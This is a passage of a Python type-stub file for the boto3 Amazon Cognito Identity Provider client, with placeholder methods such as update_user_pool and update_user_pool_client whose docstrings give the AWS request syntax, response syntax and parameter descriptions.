The number of users that were successfully imported.
- **SkippedUsers** *(integer) --*
The number of users that were skipped.
- **FailedUsers** *(integer) --*
The number of users that could not be imported.
- **CompletionMessage** *(string) --*
The message returned when the user import job is completed.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool that the users are being imported into.
:type JobId: string
:param JobId: **[REQUIRED]**
The job ID for the user import job.
:rtype: dict
:returns:
"""
pass
def stop_user_import_job(self, UserPoolId: str, JobId: str) -> Dict:
"""
Stops the user import job.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/StopUserImportJob>`_
**Request Syntax**
::
response = client.stop_user_import_job(
UserPoolId='string',
JobId='string'
)
**Response Syntax**
::
{
'UserImportJob': {
'JobName': 'string',
'JobId': 'string',
'UserPoolId': 'string',
'PreSignedUrl': 'string',
'CreationDate': datetime(2015, 1, 1),
'StartDate': datetime(2015, 1, 1),
'CompletionDate': datetime(2015, 1, 1),
'Status': 'Created'|'Pending'|'InProgress'|'Stopping'|'Expired'|'Stopped'|'Failed'|'Succeeded',
'CloudWatchLogsRoleArn': 'string',
'ImportedUsers': 123,
'SkippedUsers': 123,
'FailedUsers': 123,
'CompletionMessage': 'string'
}
}
**Response Structure**
- *(dict) --*
Represents the response from the server to the request to stop the user import job.
- **UserImportJob** *(dict) --*
The job object that represents the user import job.
- **JobName** *(string) --*
The job name for the user import job.
- **JobId** *(string) --*
The job ID for the user import job.
- **UserPoolId** *(string) --*
The user pool ID for the user pool that the users are being imported into.
- **PreSignedUrl** *(string) --*
The pre-signed URL to be used to upload the ``.csv`` file.
- **CreationDate** *(datetime) --*
The date the user import job was created.
- **StartDate** *(datetime) --*
The date when the user import job was started.
- **CompletionDate** *(datetime) --*
The date when the user import job was completed.
- **Status** *(string) --*
The status of the user import job. One of the following:
* ``Created`` - The job was created but not started.
* ``Pending`` - A transition state. You have started the job, but it has not begun importing users yet.
* ``InProgress`` - The job has started, and users are being imported.
* ``Stopping`` - You have stopped the job, but the job has not stopped importing users yet.
* ``Stopped`` - You have stopped the job, and the job has stopped importing users.
* ``Succeeded`` - The job has completed successfully.
* ``Failed`` - The job has stopped due to an error.
* ``Expired`` - You created a job, but did not start the job within 24-48 hours. All data associated with the job was deleted, and the job cannot be started.
- **CloudWatchLogsRoleArn** *(string) --*
The role ARN for the Amazon CloudWatch Logging role for the user import job. For more information, see "Creating the CloudWatch Logs IAM Role" in the Amazon Cognito Developer Guide.
- **ImportedUsers** *(integer) --*
The number of users that were successfully imported.
- **SkippedUsers** *(integer) --*
The number of users that were skipped.
- **FailedUsers** *(integer) --*
The number of users that could not be imported.
- **CompletionMessage** *(string) --*
The message returned when the user import job is completed.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool that the users are being imported into.
:type JobId: string
:param JobId: **[REQUIRED]**
The job ID for the user import job.
:rtype: dict
:returns:
"""
pass
def tag_resource(self, ResourceArn: str, Tags: Dict = None) -> Dict:
"""
Assigns a set of tags to an Amazon Cognito user pool. A tag is a label that you can use to categorize and manage user pools in different ways, such as by purpose, owner, environment, or other criteria.
Each tag consists of a key and value, both of which you define. A key is a general category for more specific values. For example, if you have two versions of a user pool, one for testing and another for production, you might assign an ``Environment`` tag key to both user pools. The value of this key might be ``Test`` for one user pool and ``Production`` for the other.
Tags are useful for cost tracking and access control. You can activate your tags so that they appear on the Billing and Cost Management console, where you can track the costs associated with your user pools. In an IAM policy, you can constrain permissions for user pools based on specific tags or tag values.
You can use this action up to 5 times per second, per account. A user pool can have as many as 50 tags.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/TagResource>`_
**Request Syntax**
::
response = client.tag_resource(
ResourceArn='string',
Tags={
'string': 'string'
}
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type ResourceArn: string
:param ResourceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the user pool to assign the tags to.
:type Tags: dict
:param Tags:
The tags to assign to the user pool.
- *(string) --*
- *(string) --*
:rtype: dict
:returns:
"""
pass
def untag_resource(self, ResourceArn: str, TagKeys: List = None) -> Dict:
"""
Removes the specified tags from an Amazon Cognito user pool. You can use this action up to 5 times per second, per account
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/UntagResource>`_
**Request Syntax**
::
response = client.untag_resource(
ResourceArn='string',
TagKeys=[
'string',
]
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type ResourceArn: string
:param ResourceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the user pool that the tags are assigned to.
:type TagKeys: list
:param TagKeys:
The keys of the tags to remove from the user pool.
- *(string) --*
:rtype: dict
:returns:
"""
pass
def update_auth_event_feedback(self, UserPoolId: str, Username: str, EventId: str, FeedbackToken: str, FeedbackValue: str) -> Dict:
"""
Provides the feedback for an authentication event whether it was from a valid user or not. This feedback is used for improving the risk evaluation decision for the user pool as part of Amazon Cognito advanced security.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/UpdateAuthEventFeedback>`_
**Request Syntax**
::
response = client.update_auth_event_feedback(
UserPoolId='string',
Username='string',
EventId='string',
FeedbackToken='string',
FeedbackValue='Valid'|'Invalid'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID.
:type Username: string
:param Username: **[REQUIRED]**
The user pool username.
:type EventId: string
:param EventId: **[REQUIRED]**
The event ID.
:type FeedbackToken: string
:param FeedbackToken: **[REQUIRED]**
The feedback token.
:type FeedbackValue: string
:param FeedbackValue: **[REQUIRED]**
The authentication event feedback value.
:rtype: dict
:returns:
"""
pass
def update_device_status(self, AccessToken: str, DeviceKey: str, DeviceRememberedStatus: str = None) -> Dict:
"""
Updates the device status.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/UpdateDeviceStatus>`_
**Request Syntax**
::
response = client.update_device_status(
AccessToken='string',
DeviceKey='string',
DeviceRememberedStatus='remembered'|'not_remembered'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
The response to the request to update the device status.
:type AccessToken: string
:param AccessToken: **[REQUIRED]**
The access token.
:type DeviceKey: string
:param DeviceKey: **[REQUIRED]**
The device key.
:type DeviceRememberedStatus: string
:param DeviceRememberedStatus:
The status of whether a device is remembered.
:rtype: dict
:returns:
"""
pass
def update_group(self, GroupName: str, UserPoolId: str, Description: str = None, RoleArn: str = None, Precedence: int = None) -> Dict:
"""
Updates the specified group with the specified attributes.
Requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/UpdateGroup>`_
**Request Syntax**
::
response = client.update_group(
GroupName='string',
UserPoolId='string',
Description='string',
RoleArn='string',
Precedence=123
)
**Response Syntax**
::
{
'Group': {
'GroupName': 'string',
'UserPoolId': 'string',
'Description': 'string',
'RoleArn': 'string',
'Precedence': 123,
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1)
}
}
**Response Structure**
- *(dict) --*
- **Group** *(dict) --*
The group object for the group.
- **GroupName** *(string) --*
The name of the group.
- **UserPoolId** *(string) --*
The user pool ID for the user pool.
- **Description** *(string) --*
A string containing the description of the group.
- **RoleArn** *(string) --*
The role ARN for the group.
- **Precedence** *(integer) --*
A nonnegative integer value that specifies the precedence of this group relative to the other groups that a user can belong to in the user pool. If a user belongs to two or more groups, it is the group with the highest precedence whose role ARN will be used in the ``cognito:roles`` and ``cognito:preferred_role`` claims in the user's tokens. Groups with higher ``Precedence`` values take precedence over groups with lower ``Precedence`` values or with null ``Precedence`` values.
Two groups can have the same ``Precedence`` value. If this happens, neither group takes precedence over the other. If two groups with the same ``Precedence`` have the same role ARN, that role is used in the ``cognito:preferred_role`` claim in tokens for users in each group. If the two groups have different role ARNs, the ``cognito:preferred_role`` claim is not set in users' tokens.
The default ``Precedence`` value is null.
- **LastModifiedDate** *(datetime) --*
The date the group was last modified.
- **CreationDate** *(datetime) --*
The date the group was created.
:type GroupName: string
:param GroupName: **[REQUIRED]**
The name of the group.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool.
:type Description: string
:param Description:
A string containing the new description of the group.
:type RoleArn: string
:param RoleArn:
The new role ARN for the group. This is used for setting the ``cognito:roles`` and ``cognito:preferred_role`` claims in the token.
:type Precedence: integer
:param Precedence:
The new precedence value for the group. For more information about this parameter, see .
:rtype: dict
:returns:
"""
pass
def update_identity_provider(self, UserPoolId: str, ProviderName: str, ProviderDetails: Dict = None, AttributeMapping: Dict = None, IdpIdentifiers: List = None) -> Dict:
"""
Updates identity provider information for a user pool.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/UpdateIdentityProvider>`_
**Request Syntax**
::
response = client.update_identity_provider(
UserPoolId='string',
ProviderName='string',
ProviderDetails={
'string': 'string'
},
AttributeMapping={
'string': 'string'
},
IdpIdentifiers=[
'string',
]
)
**Response Syntax**
::
{
'IdentityProvider': {
'UserPoolId': 'string',
'ProviderName': 'string',
'ProviderType': 'SAML'|'Facebook'|'Google'|'LoginWithAmazon'|'OIDC',
'ProviderDetails': {
'string': 'string'
},
'AttributeMapping': {
'string': 'string'
},
'IdpIdentifiers': [
'string',
],
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1)
}
}
**Response Structure**
- *(dict) --*
- **IdentityProvider** *(dict) --*
The identity provider object.
- **UserPoolId** *(string) --*
The user pool ID.
- **ProviderName** *(string) --*
The identity provider name.
- **ProviderType** *(string) --*
The identity provider type.
- **ProviderDetails** *(dict) --*
The identity provider details, such as ``MetadataURL`` and ``MetadataFile`` .
- *(string) --*
- *(string) --*
- **AttributeMapping** *(dict) --*
A mapping of identity provider attributes to standard and custom user pool attributes.
- *(string) --*
- *(string) --*
- **IdpIdentifiers** *(list) --*
A list of identity provider identifiers.
- *(string) --*
- **LastModifiedDate** *(datetime) --*
The date the identity provider was last modified.
- **CreationDate** *(datetime) --*
The date the identity provider was created.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID.
:type ProviderName: string
:param ProviderName: **[REQUIRED]**
The identity provider name.
:type ProviderDetails: dict
:param ProviderDetails:
The identity provider details to be updated, such as ``MetadataURL`` and ``MetadataFile`` .
- *(string) --*
- *(string) --*
:type AttributeMapping: dict
:param AttributeMapping:
The identity provider attribute mapping to be changed.
- *(string) --*
- *(string) --*
:type IdpIdentifiers: list
:param IdpIdentifiers:
A list of identity provider identifiers.
- *(string) --*
:rtype: dict
:returns:
"""
pass
def update_resource_server(self, UserPoolId: str, Identifier: str, Name: str, Scopes: List = None) -> Dict:
"""
Updates the name and scopes of resource server. All other fields are read-only.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/UpdateResourceServer>`_
**Request Syntax**
::
response = client.update_resource_server(
UserPoolId='string',
Identifier='string',
Name='string',
Scopes=[
{
'ScopeName': 'string',
'ScopeDescription': 'string'
},
]
)
**Response Syntax**
::
{
'ResourceServer': {
'UserPoolId': 'string',
'Identifier': 'string',
'Name': 'string',
'Scopes': [
{
'ScopeName': 'string',
'ScopeDescription': 'string'
},
]
}
}
**Response Structure**
- *(dict) --*
- **ResourceServer** *(dict) --*
The resource server.
- **UserPoolId** *(string) --*
The user pool ID for the user pool that hosts the resource server.
- **Identifier** *(string) --*
The identifier for the resource server.
- **Name** *(string) --*
The name of the resource server.
- **Scopes** *(list) --*
A list of scopes that are defined for the resource server.
- *(dict) --*
A resource server scope.
- **ScopeName** *(string) --*
The name of the scope.
- **ScopeDescription** *(string) --*
A description of the scope.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool.
:type Identifier: string
:param Identifier: **[REQUIRED]**
The identifier for the resource server.
:type Name: string
:param Name: **[REQUIRED]**
The name of the resource server.
:type Scopes: list
:param Scopes:
The scope values to be set for the resource server.
- *(dict) --*
A resource server scope.
- **ScopeName** *(string) --* **[REQUIRED]**
The name of the scope.
- **ScopeDescription** *(string) --* **[REQUIRED]**
A description of the scope.
:rtype: dict
:returns:
"""
pass
def update_user_attributes(self, UserAttributes: List, AccessToken: str) -> Dict:
"""
Allows a user to update a specific attribute (one at a time).
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/UpdateUserAttributes>`_
**Request Syntax**
::
response = client.update_user_attributes(
UserAttributes=[
{
'Name': 'string',
'Value': 'string'
},
],
AccessToken='string'
)
**Response Syntax**
::
{
'CodeDeliveryDetailsList': [
{
'Destination': 'string',
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
},
]
}
**Response Structure**
- *(dict) --*
Represents the response from the server for the request to update user attributes.
- **CodeDeliveryDetailsList** *(list) --*
The code delivery details list from the server for the request to update user attributes.
- *(dict) --*
The code delivery details being returned from the server.
- **Destination** *(string) --*
The destination for the code delivery details.
- **DeliveryMedium** *(string) --*
The delivery medium (email message or phone number).
- **AttributeName** *(string) --*
The attribute name.
:type UserAttributes: list
:param UserAttributes: **[REQUIRED]**
An array of name-value pairs representing user attributes.
For custom attributes, you must prepend the ``custom:`` prefix to the attribute name.
- *(dict) --*
Specifies whether the attribute is standard or custom.
- **Name** *(string) --* **[REQUIRED]**
The name of the attribute.
- **Value** *(string) --*
The value of the attribute.
:type AccessToken: string
:param AccessToken: **[REQUIRED]**
The access token for the request to update user attributes.
:rtype: dict
:returns:
"""
pass
def update_user_pool(self, UserPoolId: str, Policies: Dict = None, LambdaConfig: Dict = None, AutoVerifiedAttributes: List = None, SmsVerificationMessage: str = None, EmailVerificationMessage: str = None, EmailVerificationSubject: str = None, VerificationMessageTemplate: Dict = None, SmsAuthenticationMessage: str = None, MfaConfiguration: str = None, DeviceConfiguration: Dict = None, EmailConfiguration: Dict = None, SmsConfiguration: Dict = None, UserPoolTags: Dict = None, AdminCreateUserConfig: Dict = None, UserPoolAddOns: Dict = None) -> Dict:
"""
Updates the specified user pool with the specified attributes. If you don't provide a value for an attribute, it will be set to the default value. You can get a list of the current user pool settings with .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/UpdateUserPool>`_
**Request Syntax**
::
response = client.update_user_pool(
UserPoolId='string',
Policies={
'PasswordPolicy': {
'MinimumLength': 123,
'RequireUppercase': True|False,
'RequireLowercase': True|False,
'RequireNumbers': True|False,
'RequireSymbols': True|False
}
},
LambdaConfig={
'PreSignUp': 'string',
'CustomMessage': 'string',
'PostConfirmation': 'string',
'PreAuthentication': 'string',
'PostAuthentication': 'string',
'DefineAuthChallenge': 'string',
'CreateAuthChallenge': 'string',
'VerifyAuthChallengeResponse': 'string',
'PreTokenGeneration': 'string',
'UserMigration': 'string'
},
AutoVerifiedAttributes=[
'phone_number'|'email',
],
SmsVerificationMessage='string',
EmailVerificationMessage='string',
EmailVerificationSubject='string',
VerificationMessageTemplate={
'SmsMessage': 'string',
'EmailMessage': 'string',
'EmailSubject': 'string',
'EmailMessageByLink': 'string',
'EmailSubjectByLink': 'string',
'DefaultEmailOption': 'CONFIRM_WITH_LINK'|'CONFIRM_WITH_CODE'
},
SmsAuthenticationMessage='string',
MfaConfiguration='OFF'|'ON'|'OPTIONAL',
DeviceConfiguration={
'ChallengeRequiredOnNewDevice': True|False,
'DeviceOnlyRememberedOnUserPrompt': True|False
},
EmailConfiguration={
'SourceArn': 'string',
'ReplyToEmailAddress': 'string',
'EmailSendingAccount': 'COGNITO_DEFAULT'|'DEVELOPER'
},
SmsConfiguration={
'SnsCallerArn': 'string',
'ExternalId': 'string'
},
UserPoolTags={
'string': 'string'
},
AdminCreateUserConfig={
'AllowAdminCreateUserOnly': True|False,
'UnusedAccountValidityDays': 123,
'InviteMessageTemplate': {
'SMSMessage': 'string',
'EmailMessage': 'string',
'EmailSubject': 'string'
}
},
UserPoolAddOns={
'AdvancedSecurityMode': 'OFF'|'AUDIT'|'ENFORCED'
}
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
Represents the response from the server when you make a request to update the user pool.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool you want to update.
:type Policies: dict
:param Policies:
A container with the policies you wish to update in a user pool.
- **PasswordPolicy** *(dict) --*
The password policy.
- **MinimumLength** *(integer) --*
The minimum length of the password policy that you have set. Cannot be less than 6.
- **RequireUppercase** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one uppercase letter in their password.
- **RequireLowercase** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one lowercase letter in their password.
- **RequireNumbers** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one number in their password.
- **RequireSymbols** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one symbol in their password.
:type LambdaConfig: dict
:param LambdaConfig:
The AWS Lambda configuration information from the request to update the user pool.
- **PreSignUp** *(string) --*
A pre-registration AWS Lambda trigger.
- **CustomMessage** *(string) --*
A custom Message AWS Lambda trigger.
- **PostConfirmation** *(string) --*
A post-confirmation AWS Lambda trigger.
- **PreAuthentication** *(string) --*
A pre-authentication AWS Lambda trigger.
- **PostAuthentication** *(string) --*
A post-authentication AWS Lambda trigger.
- **DefineAuthChallenge** *(string) --*
Defines the authentication challenge.
- **CreateAuthChallenge** *(string) --*
Creates an authentication challenge.
- **VerifyAuthChallengeResponse** *(string) --*
Verifies the authentication challenge response.
- **PreTokenGeneration** *(string) --*
A Lambda trigger that is invoked before token generation.
- **UserMigration** *(string) --*
The user migration Lambda config type.
:type AutoVerifiedAttributes: list
:param AutoVerifiedAttributes:
The attributes that are automatically verified when the Amazon Cognito service makes a request to update user pools.
- *(string) --*
:type SmsVerificationMessage: string
:param SmsVerificationMessage:
A container with information about the SMS verification message.
:type EmailVerificationMessage: string
:param EmailVerificationMessage:
The contents of the email verification message.
:type EmailVerificationSubject: string
:param EmailVerificationSubject:
The subject of the email verification message.
:type VerificationMessageTemplate: dict
:param VerificationMessageTemplate:
The template for verification messages.
- **SmsMessage** *(string) --*
The SMS message template.
- **EmailMessage** *(string) --*
The email message template.
- **EmailSubject** *(string) --*
The subject line for the email message template.
- **EmailMessageByLink** *(string) --*
The email message template for sending a confirmation link to the user.
- **EmailSubjectByLink** *(string) --*
The subject line for the email message template for sending a confirmation link to the user.
- **DefaultEmailOption** *(string) --*
The default email option.
:type SmsAuthenticationMessage: string
:param SmsAuthenticationMessage:
The contents of the SMS authentication message.
:type MfaConfiguration: string
:param MfaConfiguration:
Can be one of the following values:
* ``OFF`` - MFA tokens are not required and cannot be specified during user registration.
* ``ON`` - MFA tokens are required for all user registrations. You can only specify required when you are initially creating a user pool.
* ``OPTIONAL`` - Users have the option when registering to create an MFA token.
:type DeviceConfiguration: dict
:param DeviceConfiguration:
Device configuration.
- **ChallengeRequiredOnNewDevice** *(boolean) --*
Indicates whether a challenge is required on a new device. Only applicable to a new device.
- **DeviceOnlyRememberedOnUserPrompt** *(boolean) --*
If true, a device is only remembered on user prompt.
:type EmailConfiguration: dict
:param EmailConfiguration:
Email configuration.
- **SourceArn** *(string) --*
The Amazon Resource Name (ARN) of a verified email address in Amazon SES. This email address is used in one of the following ways, depending on the value that you specify for the ``EmailSendingAccount`` parameter:
* If you specify ``COGNITO_DEFAULT`` , Amazon Cognito uses this address as the custom FROM address when it emails your users by using its built-in email account.
* If you specify ``DEVELOPER`` , Amazon Cognito emails your users with this address by calling Amazon SES on your behalf.
- **ReplyToEmailAddress** *(string) --*
The destination to which the receiver of the email should reply to.
- **EmailSendingAccount** *(string) --*
Specifies whether Amazon Cognito emails your users by using its built-in email functionality or your Amazon SES email configuration. Specify one of the following values:
COGNITO_DEFAULT
When Amazon Cognito emails your users, it uses its built-in email functionality. When you use the default option, Amazon Cognito allows only a limited number of emails each day for your user pool. For typical production environments, the default email limit is below the required delivery volume. To achieve a higher delivery volume, specify DEVELOPER to use your Amazon SES email configuration.
To look up the email delivery limit for the default option, see `Limits in Amazon Cognito <https://docs.aws.amazon.com/cognito/latest/developerguide/limits.html>`__ in the *Amazon Cognito Developer Guide* .
The default FROM address is no-reply@verificationemail.com. To customize the FROM address, provide the ARN of an Amazon SES verified email address for the ``SourceArn`` parameter.
DEVELOPER
When Amazon Cognito emails your users, it uses your Amazon SES configuration. Amazon Cognito calls Amazon SES on your behalf to send email from your verified email address. When you use this option, the email delivery limits are the same limits that apply to your Amazon SES verified email address in your AWS account.
If you use this option, you must provide the ARN of an Amazon SES verified email address for the ``SourceArn`` parameter.
Before Amazon Cognito can email your users, it requires additional permissions to call Amazon SES on your behalf. When you update your user pool with this option, Amazon Cognito creates a *service-linked role* , which is a type of IAM role, in your AWS account. This role contains the permissions that allow Amazon Cognito to access Amazon SES and send email messages with your address. For more information about the service-linked role that Amazon Cognito creates, see `Using Service-Linked Roles for Amazon Cognito <https://docs.aws.amazon.com/cognito/latest/developerguide/using-service-linked-roles.html>`__ in the *Amazon Cognito Developer Guide* .
:type SmsConfiguration: dict
:param SmsConfiguration:
SMS configuration.
- **SnsCallerArn** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) of the Amazon Simple Notification Service (SNS) caller.
- **ExternalId** *(string) --*
The external ID.
:type UserPoolTags: dict
:param UserPoolTags:
The tag keys and values to assign to the user pool. A tag is a label that you can use to categorize and manage user pools in different ways, such as by purpose, owner, environment, or other criteria.
- *(string) --*
- *(string) --*
:type AdminCreateUserConfig: dict
:param AdminCreateUserConfig:
The configuration for ``AdminCreateUser`` requests.
- **AllowAdminCreateUserOnly** *(boolean) --*
Set to ``True`` if only the administrator is allowed to create user profiles. Set to ``False`` if users can sign themselves up via an app.
- **UnusedAccountValidityDays** *(integer) --*
The user account expiration limit, in days, after which the account is no longer usable. To reset the account after that time limit, you must call ``AdminCreateUser`` again, specifying ``\"RESEND\"`` for the ``MessageAction`` parameter. The default value for this parameter is 7.
.. note::
If you set a value for ``TemporaryPasswordValidityDays`` in ``PasswordPolicy`` , that value will be used and ``UnusedAccountValidityDays`` will be deprecated for that user pool.
- **InviteMessageTemplate** *(dict) --*
The message template to be used for the welcome message to new users.
See also `Customizing User Invitation Messages <http://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pool-settings-message-customizations.html#cognito-user-pool-settings-user-invitation-message-customization>`__ .
- **SMSMessage** *(string) --*
The message template for SMS messages.
- **EmailMessage** *(string) --*
The message template for email messages.
- **EmailSubject** *(string) --*
The subject line for email messages.
:type UserPoolAddOns: dict
:param UserPoolAddOns:
Used to enable advanced security risk detection. Set the key ``AdvancedSecurityMode`` to the value \"AUDIT\".
- **AdvancedSecurityMode** *(string) --* **[REQUIRED]**
The advanced security mode.
:rtype: dict
:returns:
"""
pass
def update_user_pool_client(self, UserPoolId: str, ClientId: str, ClientName: str = None, RefreshTokenValidity: int = None, ReadAttributes: List = None, WriteAttributes: List = None, ExplicitAuthFlows: List = None, SupportedIdentityProviders: List = None, CallbackURLs: List = None, LogoutURLs: List = None, DefaultRedirectURI: str = None, AllowedOAuthFlows: List = None, AllowedOAuthScopes: List = None, AllowedOAuthFlowsUserPoolClient: bool = None, AnalyticsConfiguration: Dict = None) -> Dict:
"""
Updates the specified user pool app client with the specified attributes. If you don't provide a value for an attribute, it will be set to the default value. You can get a list of the current user pool app client settings with .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/UpdateUserPoolClient>`_
**Request Syntax**
::
response = client.update_user_pool_client(
UserPoolId='string',
ClientId='string',
ClientName='string',
RefreshTokenValidity=123,
ReadAttributes=[
'string',
],
WriteAttributes=[
'string',
],
ExplicitAuthFlows=[
'ADMIN_NO_SRP_AUTH'|'CUSTOM_AUTH_FLOW_ONLY'|'USER_PASSWORD_AUTH',
],
SupportedIdentityProviders=[
'string',
],
CallbackURLs=[
'string',
],
LogoutURLs=[
'string',
],
DefaultRedirectURI='string',
AllowedOAuthFlows=[
'code'|'implicit'|'client_credentials',
],
AllowedOAuthScopes=[
'string',
],
AllowedOAuthFlowsUserPoolClient=True|False,
AnalyticsConfiguration={
'ApplicationId': 'string',
'RoleArn': 'string',
'ExternalId': 'string',
'UserDataShared': True|False
}
)
**Response Syntax**
::
{
'UserPoolClient': {
'UserPoolId': 'string',
'ClientName': 'string',
'ClientId': 'string',
'ClientSecret': 'string',
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1),
'RefreshTokenValidity': 123,
'ReadAttributes': [
'string',
],
'WriteAttributes': [
'string',
],
'ExplicitAuthFlows': [
'ADMIN_NO_SRP_AUTH'|'CUSTOM_AUTH_FLOW_ONLY'|'USER_PASSWORD_AUTH',
],
'SupportedIdentityProviders': [
'string',
],
'CallbackURLs': [
'string',
],
'LogoutURLs': [
'string',
],
'DefaultRedirectURI': 'string',
'AllowedOAuthFlows': [
'code'|'implicit'|'client_credentials',
],
'AllowedOAuthScopes': [
'string',
],
'AllowedOAuthFlowsUserPoolClient': True|False,
'AnalyticsConfiguration': {
'ApplicationId': 'string',
'RoleArn': 'string',
'ExternalId': 'string',
'UserDataShared': True|False
}
}
}
**Response Structure**
- *(dict) --*
Represents the response from the server to the request to update the user pool client.
- **UserPoolClient** *(dict) --*
The user pool client value from the response from the server when an update user pool client request is made.
- **UserPoolId** *(string) --*
The user pool ID for the user pool client.
- **ClientName** *(string) --*
The client name from the user pool request of the client type.
- **ClientId** *(string) --*
The ID of the client associated with the user pool.
- **ClientSecret** *(string) --*
The client secret from the user pool request of the client type.
- **LastModifiedDate** *(datetime) --*
The date the user pool client was last modified.
- **CreationDate** *(datetime) --*
The date the user pool client was created.
- **RefreshTokenValidity** *(integer) --*
The time limit, in days, after which the refresh token is no longer valid and cannot be used.
- **ReadAttributes** *(list) --*
The Read-only attributes.
- *(string) --*
- **WriteAttributes** *(list) --*
The writeable attributes.
- *(string) --*
- **ExplicitAuthFlows** *(list) --*
The explicit authentication flows.
- *(string) --*
- **SupportedIdentityProviders** *(list) --*
A list of provider names for the identity providers that are supported on this client.
- *(string) --*
- **CallbackURLs** *(list) --*
A list of allowed redirect (callback) URLs for the identity providers.
A redirect URI must:
* Be an absolute URI.
* Be registered with the authorization server.
* Not include a fragment component.
See `OAuth 2.0 - Redirection Endpoint <https://tools.ietf.org/html/rfc6749#section-3.1.2>`__ .
Amazon Cognito requires HTTPS over HTTP except for http://localhost for testing purposes only.
App callback URLs such as myapp://example are also supported.
- *(string) --*
- **LogoutURLs** *(list) --*
A list of allowed logout URLs for the identity providers.
- *(string) --*
- **DefaultRedirectURI** *(string) --*
The default redirect URI. Must be in the ``CallbackURLs`` list.
A redirect URI must:
* Be an absolute URI.
* Be registered with the authorization server.
* Not include a fragment component.
See `OAuth 2.0 - Redirection Endpoint <https://tools.ietf.org/html/rfc6749#section-3.1.2>`__ .
Amazon Cognito requires HTTPS over HTTP except for http://localhost for testing purposes only.
App callback URLs such as myapp://example are also supported.
- **AllowedOAuthFlows** *(list) --*
Set to ``code`` to initiate a code grant flow, which provides an authorization code as the response. This code can be exchanged for access tokens with the token endpoint.
Set to ``token`` to specify that the client should get the access token (and, optionally, ID token, based on scopes) directly.
- *(string) --*
- **AllowedOAuthScopes** *(list) --*
A list of allowed ``OAuth`` scopes. Currently supported values are ``"phone"`` , ``"email"`` , ``"openid"`` , and ``"Cognito"`` .
- *(string) --*
- **AllowedOAuthFlowsUserPoolClient** *(boolean) --*
Set to TRUE if the client is allowed to follow the OAuth protocol when interacting with Cognito user pools.
- **AnalyticsConfiguration** *(dict) --*
The Amazon Pinpoint analytics configuration for the user pool client.
- **ApplicationId** *(string) --*
The application ID for an Amazon Pinpoint application.
- **RoleArn** *(string) --*
The ARN of an IAM role that authorizes Amazon Cognito to publish events to Amazon Pinpoint analytics.
- **ExternalId** *(string) --*
The external ID.
- **UserDataShared** *(boolean) --*
If ``UserDataShared`` is ``true`` , Amazon Cognito will include user data in the events it publishes to Amazon Pinpoint analytics.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool where you want to update the user pool client.
:type ClientId: string
:param ClientId: **[REQUIRED]**
The ID of the client associated with the user pool.
:type ClientName: string
:param ClientName:
The client name from the update user pool client request.
:type RefreshTokenValidity: integer
:param RefreshTokenValidity:
The time limit, in days, after which the refresh token is no longer valid and cannot be used.
:type ReadAttributes: list
:param ReadAttributes:
The read-only attributes of the user pool.
- *(string) --*
:type WriteAttributes: list
:param WriteAttributes:
The writeable attributes of the user pool.
- *(string) --*
:type ExplicitAuthFlows: list
:param ExplicitAuthFlows:
Explicit authentication flows.
- *(string) --*
:type SupportedIdentityProviders: list
:param SupportedIdentityProviders:
A list of provider names for the identity providers that are supported on this client.
- *(string) --*
:type CallbackURLs: list
:param CallbackURLs:
A list of allowed redirect (callback) URLs for the identity providers.
A redirect URI must:
* Be an absolute URI.
* Be registered with the authorization server.
* Not include a fragment component.
See `OAuth 2.0 - Redirection Endpoint <https://tools.ietf.org/html/rfc6749#section-3.1.2>`__ .
Amazon Cognito requires HTTPS over HTTP except for http://localhost for testing purposes only.
App callback URLs such as myapp://example are also supported.
- *(string) --*
:type LogoutURLs: list
:param LogoutURLs:
A list of allowed logout URLs for the identity providers.
- *(string) --*
:type DefaultRedirectURI: string
:param DefaultRedirectURI:
The default redirect URI. Must be in the ``CallbackURLs`` list.
A redirect URI must:
* Be an absolute URI.
* Be registered with the authorization server.
* Not include a fragment component.
